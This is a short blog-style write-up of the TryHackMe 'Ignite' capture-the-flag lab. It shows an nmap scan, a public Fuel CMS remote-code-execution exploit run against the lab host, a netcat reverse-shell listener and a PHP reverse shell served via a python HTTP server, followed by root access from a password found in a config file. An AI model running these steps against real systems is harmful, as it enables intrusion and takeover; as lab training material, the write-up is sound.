Post

TryHackMe | Ignite Writeup

Posted Updated
ignite
ignite
By
1 min read

TryHackMe | Ignite Writeup

image
Hello friend!
In this write up we gonna explore a THM ctf called Iginte.
Here is tryhackme link : Ignite
Level: Easy

Info Gathering and enumeration

Port Scanning

nmap -sCV 10.10.232.66
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-31 12:42 IST
Nmap scan report for 10.10.232.66
Host is up (0.17s latency).
Not shown: 999 closed tcp ports (conn-refused)
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Welcome to FUEL CMS
| http-robots.txt: 1 disallowed entry 
|_/fuel/

visiting webpage we got this
image

after google search I found this exploit for this CMS on github : https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated

git clone https://github.com/ice-wzl/Fuel-1.4.1-RCE-Updated.git
cd Fuel-1.4.1-RCE-Updated

Initial Access

terminal 1

nc -lvnp 1337

Terminal 2

python3 Fuel-Updated.py http://10.10.232.66 10.17.126.99 1338

and we got shell access,
image

To convert it into reverse shell, transfer edited php rev shell into victim machine using python.

php-reverse-shell.php
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...

image

Now, take revshell for full shell access!!!

Privilege Escalation

For privilege escalation part, I enumerated all the method and techniques, but not work,
but when I check the web page again, I found a configuration file mentioned there.
** fuel/application/config/database.php **
In this file, I found the root user’s password!!!

Final Notes!

That’s it guys, I hope you may find this useful, feel free for suggestion and improvements in writeup.

Be My Friend!

CTF
TryHackMe writeup
This post is licensed under CC BY 4.0 by the author.